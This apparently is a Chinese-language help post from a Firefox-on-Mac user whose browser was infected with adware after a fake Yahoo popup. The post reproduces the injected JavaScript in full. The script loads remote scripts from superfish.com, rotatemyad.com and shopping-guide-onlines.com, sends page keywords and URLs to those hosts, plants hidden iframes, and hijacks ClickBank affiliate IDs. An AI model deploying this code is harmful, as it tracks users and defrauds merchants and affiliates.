我正在运行最新版本的 Firefox。我的操作系统是 Mac 10.7.5。我使用 cookie 管理器,直到最近还使用 NoScript。最近我禁用了 NoScript。
登录我的一个雅虎电子邮件帐户时,我得到了一个不寻常的弹出窗口,看起来似乎是合法的。它表明我没有更新我的营销偏好,我必须这样做,否则我的帐户将被终止。“终止”部分看起来很可疑,但是窗口(在我的屏幕底部弹出)是侵入性的,所以我试图点击“X”来关闭它。它启动了另一个窗口,我立即将其关闭。
紧接着,我注意到 Firefox 的各种变化。我最终阻止了与 LittleSnitch 到 shopping-guide-onlines.com 和 superfish.com 的所有传出连接。然而,他们仍在使用一些邪恶的魔法。
当我使用 WebDeveloper 插件查看 GENERATED 源代码时,我导航到的任何页面上都会出现以下内容(我删除了个人信息)。
<script>var scr = document.createElement( "script" );
scr.type= 'text/javascript';
scr.setAttribute( "src", "http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" );
scr.setAttribute('async', 'true');
document.getElementsByTagName('head')[0].appendChild( scr );
var scr = document.createElement( "script" );
scr.type= 'text/javascript';
if (window.location.protocol.indexOf( "https" ) > -1) {
scr.setAttribute( "src", "https://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
} else {
scr.setAttribute( "src", "http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp");
}
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );
if( document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ||
document.location.href.search("•••••.com") > -1 ) {
var scr = document.createElement( "script" );
scr.type= 'text/javascript';
scr.setAttribute( "src", "http://shopping-guide-online.com/c2.php" );
document.getElementsByTagName('head')[0].appendChild( scr );
}
if( document.location.href.search("clickbank.net/order/orderform") > -1 ) {
var aff1 = "kwrdstool";
var body = document.getElementsByTagName('body')[0];
var aff2 = body.innerHTML.match(/\[affiliate = (.*?)\]/i);
if( aff2.hasOwnProperty("1") && aff2[1] != "" ) {
if( aff1 != aff2[1] ) {
var head = document.getElementsByTagName('head')[0].innerHTML;
var vend = head.match(/<!-- vs: (.*?) -->/i);
if( vend.hasOwnProperty("1") && vend[1] != "" ) {
body.style.display = "none";
var f = document.createElement('img');
f.style.width = '1px';
f.style.height = '1px';
f.style.position = 'absolute';
f.style.top = '-999px';
f.src = "http://" + aff1 + "." + vend[1] + ".hop.clickbank.net";
setTimeout( function() { window.location.href = window.location.href; }, 2000 );
body.appendChild(f);
}
}
}
}
function get_mk()
{
metaCollection = document.getElementsByTagName("meta");
for (i = 0; i < metaCollection.length; i++) {
if (metaCollection[i].name.search(/keywords/i) != -1)
{
return metaCollection[i].content
}
}
return ""
}
function add_a(a)
{
var b = document.getElementsByTagName('body')[0];
var f = document.createElement('iframe');
f.id ='ifr1';
f.style.width ='1px';
f.style.height ='1px';
f.style.position= 'absolute';
f.style.top ='-999px';
f.src = a;
b.appendChild(f);
}
function add_script(a)
{
var b = document.getElementsByTagName('head')[0];
var f = document.createElement('script');
f.id ='scr1';
f.src = a;
b.appendChild(f);
}
function contains(a, e){ for(j=0;j<a.length;j++)if(a[j]==e)return true; return false;}
function setCookie(c_name,value,exdays){ var exdate=new Date(); exdate.setDate(exdate.getDate() + exdays); var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString()); document.cookie=c_name + "=" + c_value; }
function getCookie(c_name)
{var i,x,y,ARRcookies=document.cookie.split(";");for(i=0;i<ARRcookies.length;i++)
{x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);x=x.replace(/^\s+|\s+$/g,"");if(x==c_name)
{return unescape(y);}}}
shuffle = function(o){ //v1.0
for(var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
return o;
};
function get_timestamp(){ return Math.round((new Date()).getTime() / 1000);}
function trim (myString){ return myString.replace(/^\s+/g,'').replace(/\s+$/g,'')}
var cur_loc=escape(window.location);
if( cur_loc.length<500 )
{
var scr = document.createElement( "script" );
scr.type= 'text/javascript';get_mk
scr.setAttribute( "src", "http://shopping-guide-onlines.com/search/adi/g.php?k=" + encodeURIComponent(get_mk().substring(0, 200)) + "&r=" + encodeURIComponent(window.location));
scr.setAttribute('async', 'true');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild( scr );
}var added_order=false; if(document.getElementById( "fbevid1" )!=undefined)
{
if(document.getElementById( "fbevid2" )!=undefined)
{
document.getElementById( "fbevid1" ).style.display="none";
document.getElementById( "fbevid2" ).style.display="";
}
}</script><script async="true" src="http://spns.rotatemyad.com/scripts/c07da12841ed3554e8f1a548ab1e3a57ce18a908.js" type="text/javascript"></script><script async="true" src="http://www.superfish.com/ws/sf_main.jsp?dlsource=hljijvz&userId=&CTID=mp" type="text/javascript"></script><script async="true" src="http://shopping-guide-onlines.com/search/adi/g.php?k=&r=http%3A%2F%2F••••••••.html" type="text/javascript"></script>
我还没有找到任何对此提供修复的出版物。清除缓存什么也没做。这很令人生气,因为它是偷偷摸摸的,据我了解,有许多大公司使用在线购物指南、superfish 和 rotatemyad。如果是这样,他们都是骗子。